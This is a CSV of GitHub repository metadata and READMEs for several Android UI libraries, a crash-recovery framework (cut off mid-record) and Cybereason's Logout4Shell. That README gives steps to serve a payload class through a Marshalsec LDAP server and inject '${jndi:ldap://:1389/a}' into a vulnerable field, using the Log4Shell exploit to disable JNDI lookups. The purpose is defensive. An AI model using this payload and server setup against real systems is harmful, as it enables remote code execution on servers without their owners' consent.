full_name,default_branch,stars,forks,created_at,size,open_issues_count,description,topics,readme
heysupratim/material-daterange-picker,master,1328,269,2015-09-14T12:00:47Z,868,14,A material Date Range Picker based on wdullaers MaterialDateTimePicker,datepicker datetimepicker material picker range-selection timepicker,"[![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-MaterialDateRangePicker-brightgreen.svg?style=flat)](http://android-arsenal.com/details/1/2501)
[ ![Download](https://api.bintray.com/packages/borax12/maven/material-datetime-rangepicker/images/download.svg) ](https://bintray.com/borax12/maven/material-datetime-rangepicker/_latestVersion)
[![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.borax12.materialdaterangepicker/library/badge.svg)](https://maven-badges.herokuapp.com/maven-central/com.borax12.materialdaterangepicker/library)
Material Date and Time Picker with Range Selection
======================================================
Credits to the original amazing material date picker library by wdullaer - https://github.com/wdullaer/MaterialDateTimePicker
## Adding to your project
Add the jcenter repository information in your build.gradle file like this
```gradle
repositories {
    jcenter()
}

dependencies {
    implementation 'com.borax12.materialdaterangepicker:library:2.0'
}
```
Beginning with version 2.0, the library is also available on Maven Central.
## Date Selection
![FROM](/screenshots/2.png?raw=true)
![TO](/screenshots/1.png?raw=true)
## Time Selection
![FROM](/screenshots/3.png?raw=true)
![TO](/screenshots/4.png?raw=true)
Support for Android 4.0 and up.
From the original library documentation -
You may also add the library as an Android Library to your project. All the library files live in ```library```.
Using the Pickers
--------------------------------
1. Implement an `OnDateSetListener` or `OnTimeSetListener`
2. Create a `DatePickerDialog` or `TimePickerDialog` using the supplied factory
### Implement an `OnDateSetListener`
In order to receive the date set in the picker, you will need to implement the `OnDateSetListener` interface. Typically this will be the `Activity` or `Fragment` that creates the Pickers.
or
### Implement an `OnTimeSetListener`
In order to receive the time set in the picker, you will need to implement the `OnTimeSetListener` interface. Typically this will be the `Activity` or `Fragment` that creates the Pickers.
```java
// the range-aware onDateSet callback
@Override
public void onDateSet(DatePickerDialog view, int year, int monthOfYear, int dayOfMonth, int yearEnd, int monthOfYearEnd, int dayOfMonthEnd) {
}

// the range-aware onTimeSet callback
@Override
public void onTimeSet(RadialPickerLayout view, int hourOfDay, int minute, int hourOfDayEnd, int minuteEnd) {
    String hourString = hourOfDay < 10 ? ""0""+hourOfDay : """"+hourOfDay;
    String minuteString = minute < 10 ? ""0""+minute : """"+minute;
    String hourStringEnd = hourOfDayEnd < 10 ? ""0""+hourOfDayEnd : """"+hourOfDayEnd;
    String minuteStringEnd = minuteEnd < 10 ? ""0""+minuteEnd : """"+minuteEnd;
    String time = ""You picked the following time: From - ""+hourString+""h""+minuteString+"" To - ""+hourStringEnd+""h""+minuteStringEnd;
    timeTextView.setText(time);
}
```
### Create a `DatePickerDialog` using the supplied factory
You will need to create a new instance of `DatePickerDialog` using the static `newInstance()` method, supplying proper default values and a callback. Once the dialogs are configured, you can call `show()`.
```java
Calendar now = Calendar.getInstance();
DatePickerDialog dpd = DatePickerDialog.newInstance(
        MainActivity.this,
        now.get(Calendar.YEAR),
        now.get(Calendar.MONTH),
        now.get(Calendar.DAY_OF_MONTH)
);
dpd.show(getFragmentManager(), ""Datepickerdialog"");
```
### Create a `TimePickerDialog` using the supplied factory
You will need to create a new instance of `TimePickerDialog` using the static `newInstance()` method, supplying proper default values and a callback. Once the dialogs are configured, you can call `show()`.
```java
Calendar now = Calendar.getInstance();
TimePickerDialog tpd = TimePickerDialog.newInstance(
        MainActivity.this,
        now.get(Calendar.HOUR_OF_DAY),
        now.get(Calendar.MINUTE),
        false
);
tpd.show(getFragmentManager(), ""Timepickerdialog"");
```
For other documentation regarding theming, handling orientation changes, and callbacks, check out the original documentation: https://github.com/wdullaer/MaterialDateTimePicker"
Cybereason/Logout4Shell,main,1724,115,2021-12-10T22:38:53Z,106,1,Use Log4Shell vulnerability to vaccinate a victim server against Log4Shell,,"# Logout4Shell
![logo](https://github.com/Cybereason/Logout4Shell/raw/main/assets/CR_logo.png)
## Description
A vulnerability impacting Apache Log4j versions 2.0 through 2.14.1 was disclosed on the project’s Github on December 9, 2021.
The flaw has been dubbed ""Log4Shell"" and has the highest possible severity rating of 10. Software made or
managed by the Apache Software Foundation (from here on just ""Apache"") is pervasive and comprises nearly a third of all
web servers in the world, making this a potentially catastrophic flaw.
The Log4Shell vulnerability CVE-2021-44228 was published on 12/9/2021 and allows remote code execution on vulnerable servers.
While the best mitigation against these vulnerabilities is to patch log4j to
~~2.15.0~~2.17.0 and above, in Log4j version (>=2.10) this behavior can be partially mitigated (see below) by
setting system property `log4j2.formatMsgNoLookups` to `true` or by removing
the JndiLookup class from the classpath.
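For illustration only, a minimal sketch of setting that property from your own startup code, assuming it runs before Log4j is initialized (the class name is made up; upgrading log4j remains the real fix):
```java
public final class Log4ShellFlag {
    public static void apply() {
        // Equivalent to passing -Dlog4j2.formatMsgNoLookups=true on the JVM command line.
        System.setProperty(""log4j2.formatMsgNoLookups"", ""true"");
    }
}
```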
On 12/14/2021 the Apache software foundation disclosed CVE-2021-45046 which was patched in log4j version 2.16.0. This
vulnerability showed that in certain scenarios, for example, where attackers can control a thread-context variable that
gets logged, even the flag `log4j2.formatMsgNoLookups` is insufficient to mitigate log4shell. An
additional, less severe CVE, CVE-2021-45105, was discovered. This vulnerability exposes the server to
an infinite recursion that could crash the server in some scenarios. It is recommended to upgrade to
2.17.0.
However, enabling this system property requires access to the vulnerable servers as well as a restart.
The [Cybereason](https://www.cybereason.com) research team has developed the
following code, which _exploits_ the same vulnerability; the payload it delivers
disables the vulnerable setting. The payload then searches
all `LoggerContext` instances and removes the JNDI `Interpolator`, preventing even recursive abuses.
This effectively blocks any further attempt to exploit Log4Shell on this server.
This Proof of Concept is based on [@tangxiaofeng7](https://github.com/tangxiaofeng7)'s [tangxiaofeng7/apache-log4j-poc](https://github.com/tangxiaofeng7/apache-log4j-poc)
However, this project attempts to fix the vulnerability by using the bug against itself.
You can learn more about Cybereason's ""vaccine"" approach to the Apache Log4Shell vulnerability (CVE-2021-44228) on our website.
Learn more: [Cybereason Releases Vaccine to Prevent Exploitation of Apache Log4Shell Vulnerability (CVE-2021-44228)](https://www.cybereason.com/blog/cybereason-releases-vaccine-to-prevent-exploitation-of-apache-log4shell-vulnerability-cve-2021-44228)
## Supported versions
Logout4Shell supports log4j version 2.0 - 2.14.1
## How it works
On versions (>= 2.10.0) of log4j that support the configuration `FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS`, this value is
set to `true`, disabling the lookup mechanism entirely. As disclosed in CVE-2021-45046, setting this flag alone is insufficient,
therefore the payload searches all existing `LoggerContexts` and removes the JNDI key from the `Interpolator` used to
process `${}` fields. This means that even other recursive uses of the JNDI mechanisms will fail.
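As a very rough sketch of the kind of reflection involved (this is not the project's payload; the lookup-map field name is an assumption and varies across log4j 2.x versions):
```java
import java.lang.reflect.Field;
import java.util.Map;
import org.apache.logging.log4j.core.LoggerContext;
import org.apache.logging.log4j.core.lookup.StrLookup;

final class RemoveJndiLookupSketch {
    static void removeJndi(LoggerContext ctx) throws Exception {
        // The Interpolator that resolves ${...} lookups sits behind the configuration's StrSubstitutor.
        StrLookup resolver = ctx.getConfiguration().getStrSubstitutor().getVariableResolver();
        // ""strLookupMap"" is an assumed field name for the registered lookups; it differs between versions.
        Field lookups = resolver.getClass().getDeclaredField(""strLookupMap"");
        lookups.setAccessible(true);
        ((Map<?, ?>) lookups.get(resolver)).remove(""jndi"");
    }
}
```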
Then the log4j jar file is rebuilt and patched. The patch is included in this
git repository; however, it is not needed in the final build because the real patch
is embedded in the payload as Base64.
In persistence mode (see [below](#transient-vs-persistent-mode)), the payload additionally attempts to locate the `log4j-core.jar`,
remove the `JndiLookup` class, and modify the PluginCache to completely remove the JNDI plugin. Upon subsequent JVM
restarts the `JndiLookup` class cannot be found and log4j will no longer support JNDI lookups.
## Transient vs Persistent mode
This package generates two flavors of the payload - Transient and Persistent.
In Transient mode, the payload modifies
only the currently running JVM. The payload is careful to touch only the logger context and configuration. We thus
believe the risk of using Transient mode in production environments is very low.
Persistent mode performs all the changes of the Transient mode and *in addition* searches for the jar from which `log4j`
loads the `JndiLookup` class. It then attempts to modify this jar by removing the `JndiLookup` class as well as
modifying the plugin registry. There is inherently more risk in this approach: if the `log4j-core.jar` becomes
corrupted, the JVM may crash on start.
The mode is selected by the URL given in step [2.3](#execution) below. The
class `Log4jRCETransient` selects the Transient mode and the class `Log4jRCEPersistent` selects the Persistent mode.
Persistent mode is based on the work of [TudbuT](https://github.com/TudbuT). Thank you!
## How to use
1. Download this repository and build it
1.1 `git clone https://github.com/cybereason/Logout4Shell.git`
1.2 build it - `mvn package`
1.3 `cd target/classes`
1.4 run the webserver - `python3 -m http.server 8888`
2. Download, build and run Marshalsec's ldap server
2.1 `git clone https://github.com/mbechler/marshalsec.git`
2.2 `mvn package -DskipTests`
2.3 `cd target`
2.4 `java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer ""http://:8888/#Log4jRCE""`
3. To immunize a server
3.1 enter `${jndi:ldap://:1389/a}` into a vulnerable field (such as user name)
## DISCLAIMER:
The code described in this advisory (the “Code”) is provided on an “as is” and
“as available” basis and may contain bugs, errors and other defects. You are
advised to safeguard important data and to use caution. By using this Code, you
agree that Cybereason shall have no liability to you for any claims in
connection with the Code. Cybereason disclaims any liability for any direct,
indirect, incidental, punitive, exemplary, special or consequential damages,
even if Cybereason or its related parties are advised of the possibility of
such damages. Cybereason undertakes no duty to update the Code or this
advisory.
## License
The source code for the site is licensed under the MIT license, which you can find in the LICENSE file.
"
DingMouRen/PaletteImageView,master,1762,231,2017-04-25T12:05:08Z,17741,23,"An ImageView that understands intelligent color matching and can also give itself colorful shadows.",,"![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/p1.png)
### English Readme
[English Version](https://github.com/hasanmohdkhan/PaletteImageView/blob/master/README%20English.md)
(Thank you, [hasanmohdkhan](https://github.com/hasanmohdkhan))
### Introduction
* Extracts the dominant color of an image; **by default the dominant color is used as the color of the view's shadow**
* Lets you **set a custom shadow color for the view**
* Lets you **control the corner radius of each of the four corners** (if the view is square, increasing the corner radius turns it into a circle)
* Lets you **control the blur radius of the shadow**
* Lets you **control the shadow offsets in the x and y directions** independently
* Extracts **six theme colors** from the image, each with **recommended matching colors for the background, title, and body text**
### Declare it in build.gradle
```
compile 'com.dingmouren.paletteimageview:paletteimageview:1.0.7'
```
![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/title.gif)
##### 1. Controlling the parameters
Corner radius|Shadow blur range|Shadow offset
---|---|---
![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/demo1.gif) | ![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/demo2.gif) | ![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/demo3.gif)
##### 2. The shadow color defaults to the image's dominant color
![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/demo4.gif)
![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/p2.png)
##### 3. Parsing the image's color themes
![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/p3.png)
### Usage
```
mPaletteImageView.setOnParseColorListener(new PaletteImageView.OnParseColorListener() {
    @Override // color extraction finished
    public void onComplete(PaletteImageView paletteImageView) {
        int[] vibrant = paletteImageView.getVibrantColor();
        int[] vibrantDark = paletteImageView.getDarkVibrantColor();
        int[] vibrantLight = paletteImageView.getLightVibrantColor();
        int[] muted = paletteImageView.getMutedColor();
        int[] mutedDark = paletteImageView.getDarkMutedColor();
        int[] mutedLight = paletteImageView.getLightMutedColor();
    }

    @Override // color extraction failed
    public void onFail() {
    }
});
```
### XML attributes
XML attribute | Description
---|---
app:palettePadding | **The maximum space reserved for the shadow. With a value of 0 there is no shadow; a shadow is drawn only when the value is greater than 0.**
app:paletteOffsetX | The shadow offset in the x direction
app:paletteOffsetY | The shadow offset in the y direction
app:paletteSrc | The image resource
app:paletteRadius | The corner radius
app:paletteShadowRadius | The shadow blur radius
### Public methods
Method | Description
---|---
public void setShadowColor(int color) | Sets a custom shadow color for the view
public void setBitmap(Bitmap bitmap) | Sets the view's bitmap
public void setPaletteRadius(int radius) | Sets the view's corner radius
public void setPaletteShadowOffset(int offsetX, int offsetY) | Sets the shadow offsets in the x and y directions
public void setPaletteShadowRadius(int radius) | Sets the shadow blur radius
public void setOnParseColorListener(OnParseColorListener listener) | Sets the listener for color extraction from the image
public int[] getVibrantColor() | Returns the color array for the Vibrant theme; given an array arry, arry[0] is the recommended title color, arry[1] the recommended body text color, and arry[2] the recommended background color. The colors are only recommendations; you can choose your own
public int[] getDarkVibrantColor()| Returns the color array for the DarkVibrant theme; the array elements have the same meaning as above
public int[] getLightVibrantColor()| Returns the color array for the LightVibrant theme; the array elements have the same meaning as above
public int[] getMutedColor()| Returns the color array for the Muted theme; the array elements have the same meaning as above
public int[] getDarkMutedColor()| Returns the color array for the DarkMuted theme; the array elements have the same meaning as above
public int[] getLightMutedColor()| Returns the color array for the LightMuted theme; the array elements have the same meaning as above
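A minimal Java sketch of calling these setters together (the view id, drawable, and color value below are made up for illustration):
```
PaletteImageView paletteImageView = findViewById(R.id.palette_image_view); // hypothetical id
paletteImageView.setBitmap(BitmapFactory.decodeResource(getResources(), R.drawable.sample)); // hypothetical drawable
paletteImageView.setPaletteRadius(20);            // corner radius
paletteImageView.setPaletteShadowOffset(10, 10);  // shadow offset in x and y
paletteImageView.setPaletteShadowRadius(30);      // shadow blur radius
paletteImageView.setShadowColor(Color.parseColor(""#FF4081"")); // custom shadow color instead of the dominant color
```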
This project is no longer actively maintained.
"
totond/TextPathView,master,1916,214,2018-01-10T10:36:47Z,315,3,A View with text path animation!,,"# TextPathView
![](https://img.shields.io/badge/JCenter-0.2.1-brightgreen.svg)
> [Go to the English README](https://github.com/totond/TextPathView/blob/master/README-en.md)
## Introduction
TextPathView is a custom view that turns text into path animations and renders them. The effect is shown above.
> Here is an [explanation of how it works!](https://juejin.im/post/5a9677b16fb9a063375765ad)
### Important changes in v0.2.+
- You can now control not only the end position of the text path, but also the start position, as shown in the second image above
- Subclasses of PathCalculator can be used to implement various path transformations, such as the MidCalculator, AroundCalculator, and BlinkCalculator described below
- The FillColor attribute can be set directly to control whether the text is filled with color when the animation ends
![TextPathView v0.2.+](https://raw.githubusercontent.com/totond/MyTUKU/master/textpathnew1.png)
## Usage
The basic workflow is: set the text, configure some animation attributes and pen effects, then start the animation. You can also drive the drawing progress yourself; see below for details.
### Gradle
```
compile 'com.yanzhikai:TextPathView:0.2.1'
```
> minSdkVersion 16
> If the text disappears after the animation finishes, disable hardware acceleration; hardware acceleration may not support the `drawPath()` method
### How to use
#### TextPathView
There are two kinds of TextPathView: SyncTextPathView, which draws each stroke in sequence, and AsyncTextPathView, which draws all strokes at the same time. They are used the same way: configure the attributes in XML, then call startAnimation() in Java. See the examples and the demo for details. Here is a simple example:
In XML:
```
```
In Java:
```
atpv1 = findViewById(R.id.atpv_1);
stpv_2017 = findViewById(R.id.stpv_2017);
// animate from hidden to fully drawn
atpv1.startAnimation(0,1);
// animate from fully drawn to hidden
stpv_2017.startAnimation(1,0);
```
You can also control how much of the TextPathView is drawn by driving the progress yourself, here with a SeekBar:
```
sb_progress.setOnSeekBarChangeListener(new SeekBar.OnSeekBarChangeListener() {
    @Override
    public void onProgressChanged(SeekBar seekBar, int progress, boolean fromUser) {
        atpv1.drawPath(progress / 1000f);
        stpv_2017.drawPath(progress / 1000f);
    }
    @Override public void onStartTrackingTouch(SeekBar seekBar) { }
    @Override public void onStopTrackingTouch(SeekBar seekBar) { }
});
```
#### PathView
PathView was added in version 0.1.1 and has three subclasses: TextPathView, SyncPathView, and AsyncPathView. The first, described above, draws text paths; the latter two draw arbitrary shape paths and require a Path object to run properly:
```
public class TestPath extends Path {
    public TestPath() {
        init();
    }
    private void init() {
        addCircle(350, 300, 150, Direction.CCW);
        addCircle(350, 300, 100, Direction.CW);
        addCircle(350, 300, 50, Direction.CCW);
        moveTo(350, 300);
        lineTo(550, 500);
    }
}
```
```
// you must call setPath() to set the path first
aspv.setPath(new TestPath());
aspv.startAnimation(0,1);
```
![](https://github.com/totond/MyTUKU/blob/master/textdemo2.gif?raw=true)
(The screen recording has some artifacts; there is actually no background color.) Above is the effect of SyncPathView and AsyncPathView; the difference between them is the same as for the text path views.
### Attributes
|**Attribute**|**Meaning**|**Type**|**Default**|
|--|--|:--:|:--:|
|textSize | Text size | integer| 108 |
|text | The text content | String| Test|
|autoStart| Whether to start the animation automatically after loading | boolean| false|
|showInStart| Whether to show all of the text at the start | boolean| false|
|textInCenter| Whether to center the text in the view | boolean| false|
|duration | Animation duration, in ms | integer| 10000|
|showPainter | Whether to show the pen effect while the animation is running | boolean| false|
|showPainterActually| Whether to show the pen effect at all times| boolean| false|
|~~textStrokeWidth~~ strokeWidth | Stroke width of the drawn path | dimension| 5px|
|~~textStrokeColor~~ pathStrokeColor| Stroke color of the drawn path | color| Color.black|
|paintStrokeWidth | Stroke width of the pen effect | dimension| 3px|
|paintStrokeColor | Stroke color of the pen effect | color| Color.black|
|repeat| Whether and how the animation repeats| enum | NONE|
|fillColor| Whether to fill the text with color when the animation ends | boolean | false |
|**repeat value**|**Meaning**|
|--|--|
|NONE|Do not repeat|
|RESTART|Repeat from the beginning|
|REVERSE|Repeat in reverse from the end|
> PS: Because the pen effect should disappear once drawing is finished, showPainterActually is automatically reset to false after each animation. It is therefore best used when you are not using the built-in animations.
### Methods
#### Pen effects
```
//set the pen effect (synchronous version)
public void setPainter(SyncPathPainter painter);
//set the pen effect (asynchronous version)
public void setPainter(AsyncPathPainter painter);
```
Because the drawing principles differ, there are two kinds of pen effects:
```
public interface SyncPathPainter extends PathPainter {
    // called when the animation starts
    void onStartAnimation();

    /**
     * Called while the pen effect is being drawn
     * @param x x coordinate of the current drawing point
     * @param y y coordinate of the current drawing point
     * @param paintPath the pen Path object; draw the pen effect you want here
     */
    @Override
    void onDrawPaintPath(float x, float y, Path paintPath);
}

public interface AsyncPathPainter extends PathPainter {
    /**
     * Called while the pen effect is being drawn
     * @param x x coordinate of the current drawing point
     * @param y y coordinate of the current drawing point
     * @param paintPath the pen Path object; draw the pen effect you want here
     */
    @Override
    void onDrawPaintPath(float x, float y, Path paintPath);
}
```
The names make it clear which one is which. To create a custom pen effect, implement one or both of the interfaces above and draw it yourself.
In addition, three pen effects are built in, for reference and direct use (for how they are implemented, see the [explanation of how it works](http://blog.csdn.net/totond/article/details/79375200)):
```
//Arrow pen effect: the arrow direction follows the velocity direction between the current point and the previous one
public class ArrowPainter implements SyncPathPainter {
//Pen effect: draws a pen next to the current drawing point
public class PenPainter implements SyncPathPainter,AsyncPathPainter {
//Fireworks effect: derived from the arrow effect; the spark direction follows the velocity computed from the current and previous points
public class FireworksPainter implements SyncPathPainter {
```
As you can see, the fireworks and arrow effects both need to record the previous point, so they only suit SyncTextPathView, which draws in sequence, while PenPainter suits both kinds of TextPathView. If you read their code, you will find they are all very simple to draw.
#### Custom pen effects
Creating a custom pen effect is also very simple: the idea is to add an extra Path at the current drawing point. Implement one or both of SyncPathPainter and AsyncPathPainter and override the `onDrawPaintPath(float x, float y, Path paintPath)` method, like this:
```
atpv2.setPathPainter(new AsyncPathPainter() {
@Override
public void onDrawPaintPath(float x, float y, Path paintPath) {
paintPath.addCircle(x,y,6, Path.Direction.CCW);
}
});
```
![](https://github.com/totond/MyTUKU/blob/master/textdemo3.gif?raw=true)
#### Animation listener
```
//set a custom animation listener
public void setAnimatorListener(PathAnimatorListener animatorListener);
```
PathAnimatorListener is a class that implements the AnimatorListener interface. When extending it, be careful not to remove the super calls, because they may do some work internally.
#### Getting the paints
```
//get the paint used to draw the text
public Paint getDrawPaint() {
    return mDrawPaint;
}
//get the paint used to draw the pen effect
public Paint getPaint() {
    return mPaint;
}
```
#### Controlling the drawing
```
/**
 * Draws the text path.
 *
 * @param start start of the path, as a fraction
 * @param end end of the path, as a fraction
 */
public abstract void drawPath(float start, float end);

/**
 * Starts the path animation.
 * @param start path fraction, range 0-1
 * @param end path fraction, range 0-1
 */
public void startAnimation(float start, float end);

/**
 * Draws the path.
 * @param progress drawing progress, 0-1
 */
public void drawPath(float progress);
/**
* Stop animation
*/
public void stopAnimation();
/**
* Pause animation
*/
@RequiresApi(api = Build.VERSION_CODES.KITKAT)
public void pauseAnimation();
/**
* Resume animation
*/
@RequiresApi(api = Build.VERSION_CODES.KITKAT)
public void resumeAnimation();
```
#### Fill color
```
//immediately show all of the text filled with color
public void showFillColorText();
//set whether to fill with color after the animation finishes
public void setFillColor(boolean fillColor);
```
Because the text path is not closed while it is still being drawn, filling it with color would look messy, so `showFillColorText()` is provided to show all of the text already filled with color. Typically you switch to the filled text once the animation has finished and the text is fully shown.
![](https://github.com/totond/MyTUKU/blob/master/textdemo4.gif?raw=true)
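For example, a minimal sketch (assuming a view named textPathView) that switches to the filled text when the built-in animation ends, using the PathAnimatorListener described above:
```
textPathView.setAnimatorListener(new PathAnimatorListener() {
    @Override
    public void onAnimationEnd(Animator animation) {
        super.onAnimationEnd(animation); // keep the super call, it may do some work internally
        textPathView.showFillColorText(); // show the fully filled text
    }
});
textPathView.startAnimation(0, 1);
```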
#### Path calculators
Starting with version 0.2.+, a value calculator, PathCalculator, was added; it can be set with the `setCalculator(PathCalculator calculator)` method. A PathCalculator controls the values of the path's start and end for each progress value. TextPathView ships with several PathCalculator subclasses:
- **MidCalculator**
start and end expand outward from 0.5:
![MidCalculator](https://github.com/totond/MyTUKU/blob/master/text4.gif?raw=true)
- **AroundCalculator**
start grows along with end; once end reaches 0.75, start grows in the opposite direction
![AroundCalculator](https://github.com/totond/MyTUKU/blob/master/text5.gif?raw=true)
- **BlinkCalculator**
start stays at 0 and end grows normally, but every few steps end jumps to 1, producing a blinking effect
![BlinkCalculator](https://github.com/totond/MyTUKU/blob/master/text2.gif?raw=true)
- **Custom PathCalculator:** you can extend the abstract PathCalculator class and use its `setStart(float start)` and `setEnd(float end)` methods; see the implementations of the built-in PathCalculators above for reference.
#### Other methods
```
//set the text content
public void setText(String text);
//set the path; it must be set before calling startAnimation(), otherwise an error is thrown!
public void setPath(Path path);
//set the typeface
public void setTypeface(Typeface typeface);
//clear the canvas
public void clear();
//set whether the pen effect is shown while animating
public void setShowPainter(boolean showPainter);
//set whether the pen effect is shown at all times; it is automatically reset to false after each animation because the effect should disappear once drawing is finished
public void setCanShowPainter(boolean canShowPainter);
//set the animation duration
public void setDuration(int duration);
//set the repeat mode
public void setRepeatStyle(int repeatStyle);
//set the calculator for the path's start and end values
public void setCalculator(PathCalculator calculator)
```
## Changelog
- 2018/03/08 **version 0.0.5**:
  - Added the `showFillColorText()` method to show all of the text already filled with color.
  - Moved PathAnimatorListener out of TextPathView's inner classes; it was too cumbersome to use before.
  - Added the `showPainterActually` attribute to show the pen effect at all times. Because the effect should disappear once drawing is finished, it is automatically reset to false after each animation; its purpose is to show the pen effect when you are not using the built-in Animator.
- 2018/03/08 **version 0.0.6**:
  - Added `stop(), pause(), resume()` methods to control the animation. I originally thought users could implement this with their own Animator, but a PR from [toanvc](https://github.com/toanvc) wraps it up nicely and I made small adjustments; note that the latter two require API 19 or higher.
  - Added the `repeat` attribute so the animation can be played repeatedly, also from a PR by [toanvc](https://github.com/toanvc).
- 2018/03/18 **version 0.1.0**:
  - Refactored the code, added the path animation views SyncPathView and AsyncPathView, and abstracted the common parent class into PathView
  - Added `setDuration()` and `setRepeatStyle()`
  - Renamed a number of classes as follows:
|Old Name|New Name|
|---|---|
|TextPathPainter|PathPainter|
|SyncTextPainter|SyncPathPainter|
|AsyncTextPainter|AsyncPathPainter|
|TextAnimatorListener|PathAnimatorListener|
- 2018/03/21 **version 0.1.2**:
  - Fixed content possibly not being fully shown when the height is wrap_content
  - Previously, when PathMeasure extracted the text Path, roughly one pixel was missing at the end; now onDraw checks whether progress is 1 to draw the full path (this may prevent the view from rendering with hardware acceleration, which then has to be disabled manually for this view)
  - Added typeface settings
  - Added automatic line wrapping
![](https://github.com/totond/MyTUKU/blob/master/textdemo5.gif?raw=true)
- 2018/09/09 **version 0.1.3**:
  - Hardware acceleration is disabled for this view by default
  - Added memory leak protection
  - Preparation for further optimization
- 2019/04/04 **version 0.2.1**:
  - You can now control the start position of the text path as well as the end position
  - Subclasses of PathCalculator can be used to implement path transformations, such as the MidCalculator, AroundCalculator, and BlinkCalculator above
  - The FillColor attribute can be set directly to control whether the text is filled when the animation ends
  - Hardware acceleration issues resolved; it is now enabled by default
  - Removed useless logs and error messages
#### Future plans:
- More effects and more animations. Ideas and suggestions are welcome as issues, and PRs are welcome too.
- Better performance. A single TextPathView animates smoothly on the emulator, but several at once stutter slightly; on a reasonably powerful real device several instances are fine. I have no concrete plan for this yet.
- Support for newline characters in the text.
- Measuring the width and height of a Path (including blank space, starting from coordinate (0,0))
## Contributing
If you would like to help improve TextPathView, PRs are welcome:
- First, please create a branch.
- If you add a new feature or effect, please do not overwrite the demo Activity code already used for the demos (such as the examples in FristActivity); add a new Activity for your demo, or skip adding demo code.
- If you change existing functionality or code, please include your reasoning and ideas.
- Translating the README into English (I have no time to keep the English version up to date)
## License
TextPathView is released under the MIT license.
## About the author
> id: 炎之铠
> Email: yanzhikai_yjk@qq.com
> CSDN: http://blog.csdn.net/totond
"
unofficial-openjdk/openjdk,defunct,2171,1032,2012-08-09T20:39:52Z,2386310,0,Do not send pull requests! Automated Git clone of various OpenJDK branches,,"This repository is no longer actively updated. Please see https://github.com/openjdk for a much better mirror of OpenJDK!
"
Sunzxyong/Recovery,master,1695,220,2016-09-04T08:13:19Z,894,27,a crash recovery framework.(一个App异常恢复框架),application-crash crash crash-recovery-framework recovery restore,"# **Recovery**
A crash recovery framework!
----
[ ![Download](https://api.bintray.com/packages/sunzxyong/maven/Recovery/images/download.svg) ](https://bintray.com/sunzxyong/maven/Recovery/_latestVersion) ![build](https://img.shields.io/badge/build-passing-blue.svg) [![License](https://img.shields.io/hexpm/l/plug.svg)](https://github.com/Sunzxyong/Recovery/blob/master/LICENSE)
[中文文档](https://github.com/Sunzxyong/Recovery/blob/master/README-Chinese.md)
# **Introduction**
[Blog entry with introduction](http://zhengxiaoyong.com/2016/09/05/Android%E8%BF%90%E8%A1%8C%E6%97%B6Crash%E8%87%AA%E5%8A%A8%E6%81%A2%E5%A4%8D%E6%A1%86%E6%9E%B6-Recovery)
“Recovery” helps you automatically handle application crashes at runtime. It provides the following functionality:
* Automatic recovery activity with stack and data;
* Ability to recover to the top activity;
* A way to view and save crash info;
* Ability to restart and clear the cache;
* Allows you to do a restart instead of recovering if failed twice in one minute.
# **Art**
![recovery](http://7xswxf.com2.z0.glb.qiniucdn.com//blog/recovery.jpg)
# **Usage**
## **Installation**
**Using Gradle**
```gradle
implementation 'com.zxy.android:recovery:1.0.0'
```
or
```gradle
debugImplementation 'com.zxy.android:recovery:1.0.0'
releaseImplementation 'com.zxy.android:recovery-no-op:1.0.0'
```
**Using Maven**
```xml
<dependency>
  <groupId>com.zxy.android</groupId>
  <artifactId>recovery</artifactId>
  <version>1.0.0</version>
  <type>pom</type>
</dependency>
```
## **Initialization**
You can use this code sample to initialize Recovery in your application:
```java
Recovery.getInstance()
.debug(true)
.recoverInBackground(false)
.recoverStack(true)
.mainPage(MainActivity.class)
.recoverEnabled(true)
.callback(new MyCrashCallback())
.silent(false, Recovery.SilentMode.RECOVER_ACTIVITY_STACK)
.skip(TestActivity.class)
.init(this);
```
If you don't want to show the RecoveryActivity when the application crashes at runtime, you can use silent recovery to restore your application.
You can use this code sample to initialize Recovery in your application:
```java
Recovery.getInstance()
.debug(true)
.recoverInBackground(false)
.recoverStack(true)
.mainPage(MainActivity.class)
.recoverEnabled(true)
.callback(new MyCrashCallback())
.silent(true, Recovery.SilentMode.RECOVER_ACTIVITY_STACK)
.skip(TestActivity.class)
.init(this);
```
If you only need to display the 'RecoveryActivity' page in development builds to obtain debug data, and not in release builds, you can set `recoverEnabled(false)` for release.
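For example, a minimal sketch that keys this off the build type (assuming your module's `BuildConfig` and the `MainActivity` used above):
```java
Recovery.getInstance()
        .recoverEnabled(BuildConfig.DEBUG) // show the RecoveryActivity only in debug builds
        .mainPage(MainActivity.class)
        .init(this);
```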
## **Arguments**
| Argument | Type | Function |
| :-: | :-: | :-: |
| debug | boolean | Whether to enable debug mode |
| recoverInBackground | boolean | Whether to restore the stack when the app is in the background |
| recoverStack | boolean | Whether to restore the whole activity stack, or only the top activity |
| mainPage | Class<? extends Activity> | Initial page activity |
| callback | RecoveryCallback | Crash info callback |
| silent | boolean, SilentMode | Whether to use silent recovery; if true, the RecoveryActivity is not displayed and the activity stack is restored automatically |
**SilentMode**
> 1. RESTART - Restart App
> 2. RECOVER_ACTIVITY_STACK - Restore the activity stack
> 3. RECOVER_TOP_ACTIVITY - Restore the top activity
> 4. RESTART_AND_CLEAR - Restart App and clear data
## **Callback**
```java
public interface RecoveryCallback {
void stackTrace(String stackTrace);
void cause(String cause);
void exception(
String throwExceptionType,
String throwClassName,
String throwMethodName,
int throwLineNumber
);
void throwable(Throwable throwable);
}
```
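For instance, a minimal sketch of a callback implementation (a `MyCrashCallback` like the one referenced in the initialization samples) that simply logs the crash details; the log tag is arbitrary:
```java
public class MyCrashCallback implements RecoveryCallback {
    @Override
    public void stackTrace(String stackTrace) {
        Log.e(""Recovery"", ""stackTrace: "" + stackTrace);
    }

    @Override
    public void cause(String cause) {
        Log.e(""Recovery"", ""cause: "" + cause);
    }

    @Override
    public void exception(String throwExceptionType, String throwClassName,
                          String throwMethodName, int throwLineNumber) {
        Log.e(""Recovery"", ""exception: "" + throwExceptionType + "" at ""
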